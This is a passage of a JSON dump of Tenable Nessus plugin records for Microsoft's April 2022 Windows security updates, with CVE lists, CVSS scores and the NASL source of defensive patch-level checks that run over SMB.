CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801,\n CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012658\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012632 or Cumulative Update 5012658\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012658',\n '5012632'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012658, 5012632])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:03", "description": "The remote Windows host is missing security update 5012653. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012653.NASL", "href": "https://www.tenable.com/plugins/nessus/159680", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159680);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012653\");\n script_xref(name:\"MSFT\", value:\"MS22-5012653\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012653. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, \n CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, \n CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, \n CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916, \n CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, \n CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, \n CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, \n CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493, CVE-2022-24498,\n CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012653\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012653\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012653'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012653])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:23", "description": "The remote Windows host is missing security update 5012666 or cumulative update 5012650. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26812, CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916, CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528, CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26796, CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807, CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801, CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012666: Windows Server 2012 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26784", "CVE-2022-26787", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012666.NASL", "href": "https://www.tenable.com/plugins/nessus/159676", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159676);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26784\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012650\");\n script_xref(name:\"MSKB\", value:\"5012666\");\n script_xref(name:\"MSFT\", value:\"MS22-5012650\");\n script_xref(name:\"MSFT\", value:\"MS22-5012666\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012666: Windows Server 2012 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012666\nor cumulative update 5012650. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26812,\n CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916,\n CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528,\n CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26796,\n CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807,\n CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801,\n CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012650\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012666 or Cumulative Update 5012650\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012666',\n '5012650'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012666, 5012650])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:03", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012639. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012649: Windows Server 2008 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012649.NASL", "href": "https://www.tenable.com/plugins/nessus/159672", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159672);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n 